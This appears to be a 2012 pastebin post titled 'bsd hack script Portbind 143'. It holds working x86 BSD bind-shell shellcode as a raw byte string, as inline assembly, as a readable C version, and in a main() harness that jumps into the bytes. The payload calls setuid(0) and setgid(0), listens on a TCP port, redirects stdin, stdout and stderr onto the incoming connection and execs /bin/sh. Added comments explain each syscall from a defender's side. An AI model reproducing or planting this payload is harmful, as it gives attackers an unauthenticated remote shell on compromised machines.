emS-St1ks

bsd hack script Portbind 143

Jun 17th, 2012
/*
** Bind-shell payload as raw x86 bytes; trojan() below is the same sequence
** written in C. Every "\xCD\x80" is an `int $0x80` (BSD-style syscall trap,
** arguments pushed on the stack beforehand) and the comment after it names
** the syscall that group performs. The trailing bytes are the hand-packed
** socket address and the "/bin/sh" path the later syscalls use.
** From the defender's side: this process creates, binds and listens on a
** TCP socket, redirects fds 0-2 onto the accepted connection and execs a
** shell. The setuid/setgid calls are not an escalation — they only succeed
** if the process already holds (or has saved) uid/gid 0.
** NOTE(review): sizeof(shellcode) includes the terminating NUL added by the
** string literal, so the length main() prints is one more than the number
** of executable bytes.
*/
char shellcode[] =
"\x31\xC0"
"\x50"
"\x50"
"\xB0\x17"
"\xCD\x80"      // setuid
"\x31\xC0"
"\x50"
"\x50"
"\xB0\xB5"
"\xCD\x80"      // setgid
"\xEB\x60"
"\x5E"
"\x31\xC0"
"\x89\x46\x04"
"\x88\x46\x17"
"\x6A\x06"
"\x6A\x01"
"\x6A\x02"
"\xb0\x61"
"\x50"
"\xCD\x80"      // socket
"\x89\xc7"
"\x31\xc0"
"\x6a\x10"
"\x56"
"\x57"
"\xb0\x68"
"\x50"
"\xCD\x80"      // bind
"\x6A\x01"
"\x57"
"\xb0\x6A"
"\x50"
"\xCD\x80"      // listen
"\x50"
"\x50"
"\x57"
"\xB0\x1E"
"\x50"
"\xCD\x80"      // accept
"\x89\xc7"
"\x31\xDB"
"\x31\xc9"
"\xb1\x03"
"\x49"
"\x31\xc0"
"\xb0\x5A"
"\x51"
"\x57"
"\x50"
"\xcd\x80"      // dup2 (loops three times: fds 2, 1, 0)
"\x39\xd9"
"\x75\xf2"
"\x31\xc0"
"\x89\x76\x18"
"\x89\x46\x1c"
"\x8D\x56\x1c"
"\x8D\x4E\x18"
"\x83\xc6\x10"
"\x52"
"\x51"
"\x56"
"\xb0\x3b"
"\x50"
"\xcd\x80"      // execve
"\xe8\x9b\xff\xff\xff"
"\xc0\x02\x7a\x69\x90\x90\x90\x90\xc0\xd5\xbf\xef\xb8\xd5\xbf\xef"   // socket address (see trojan())
"/bin/sh";
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
/*
** ASM shellcode
**
** The same payload as shellcode[] in GNU-syntax inline assembly — presumably
** the source the byte string was assembled from. The syscall groups match
** the comments on shellcode[] one for one (setuid, setgid, socket, bind,
** listen, accept, dup2 loop, execve).
** NOTE(review): the whole listing is a single string literal that spans
** physical lines; ISO C does not allow that (use "\n" escapes or adjacent
** literals), so this only compiles on old GCC releases. The function has
** no return type (implicit int, pre-C99) and no return statement; on the
** intended path execve replaces the process image so control never comes
** back here. Note also that main() declares a local variable named fct
** that shadows this function.
*/
fct()
{
  __asm__("
 
 
xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0x17, %al
int   $0x80
 
xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0xB5, %al
int   $0x80
 
 
 
jmp  data
code:
popl  %esi
xorl  %eax, %eax
movl  %eax, 0x04(%esi)
movb  %al , 0x17(%esi)
 
pushl $0x06
pushl $0x01
pushl $0x02
movb  $0x61, %al
pushl %eax
int   $0x80
 
movl  %eax, %edi
xorl  %eax, %eax
pushl $0x10
pushl %esi
pushl %edi
movb  $0x68, %al
pushl %eax
int   $0x80
 
pushl $0x01
pushl %edi
movb  $0x6A, %al
pushl %eax
int   $0x80
 
pushl %eax
pushl %eax
pushl %edi
movb  $0x1E, %al
pushl %eax
int   $0x80
 
movl  %eax, %edi
xorl  %ebx, %ebx
xorl  %ecx, %ecx
movb  $0x03, %ecx
loop:
decl  %ecx
xorl  %eax, %eax
movb  $0x5A, %al
pushl %ecx
pushl %edi
pushl %eax
int   $0x80
cmpl  %ebx, %ecx
jne   loop
 
xorl  %eax, %eax
movl  %esi, 0x18(%esi)
movl  %eax, 0x1C(%esi)
leal  0x1C(%esi), %edx
leal  0x18(%esi), %ecx
addl  $0x10, %esi
pushl %edx
pushl %ecx
pushl %esi
movb  $0x3B, %al
pushl %eax
int   $0x80
 
data:
call  code
.string \"\xC0\x02\x7A\x69\x90\x90\x90\x90\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF\"
.string \"/bin/sh\x90\"
");
}
  168.  
  169.  
  170.  
  171.  
/*
** Test
**
** Harness that runs shellcode[] inside this process: prints the array size,
** then jumps into the bytes through a function pointer.
** NOTE(review): printf() is called without <stdio.h> (implicit declaration)
** and "%d" is paired with a size_t from sizeof — use "%zu". Casting a data
** array to a function pointer is undefined in ISO C, and on any system with
** a non-executable data segment (W^X / NX) the call faults rather than
** running; that fault, or — where it does run — the socket/bind/listen/
** accept/dup2/execve chain from a single process, is what a host monitor
** observes. The local `fct` shadows the fct() function defined above.
*/
main()
{
  void  (*fct)();
   
  printf("shellcode lenght = %d bytes \n", sizeof(shellcode));
  fct = (void *) shellcode;
  fct();
}
  183.  
  184.  
  185.  
  186.  
  187.  
/*
** C shellcode
**
** Readable C version of the payload in shellcode[]: open a listening TCP
** socket, accept one connection, redirect fds 0-2 onto it, exec "/bin/sh".
** `server` is a hand-packed 16-byte socket address (the same bytes as the
** tail of shellcode[] with the four 0x90 filler bytes zeroed) passed where
** bind() expects a `const struct sockaddr *`; no headers are included, so
** every call here is an implicit declaration. Not called from main() — it
** documents the intent of the byte string.
** NOTE(review): no return value is checked: socket/bind/accept can fail,
** setuid(0)/setgid(0) fail with EPERM unless the process already has uid 0,
** and a failed execve falls off the end of a function with no return type.
*/
trojan()
{
  int                   clientsock;
  int                   serversock;
  char                  *server;
  char                  *args[2];
   
  server = "\xC0\x02\x7A\x69\x00\x00\x00\x00\xC0\xD5\xBF\xEF\xB8\xD5\xBF\xEF";
  args[0] = "/bin/sh";
  args[1] = 0x00;                          /* argv terminator; also passed as envp below */
  setuid(0);
  setgid(0);
  serversock = socket(0x02, 0x01, 0x06);   /* AF_INET, SOCK_STREAM, IPPROTO_TCP */
  bind(serversock, server, 0x10);          /* 0x10 == sizeof(struct sockaddr_in) */
  listen(serversock, 0x01);
  clientsock = accept(serversock, 0x00, 0x00);
  dup2(clientsock, 0x02);                  /* stderr, stdout, stdin onto the connection */
  dup2(clientsock, 0x01);
  dup2(clientsock, 0x00);
  execve(args[0], args, args[1]);
}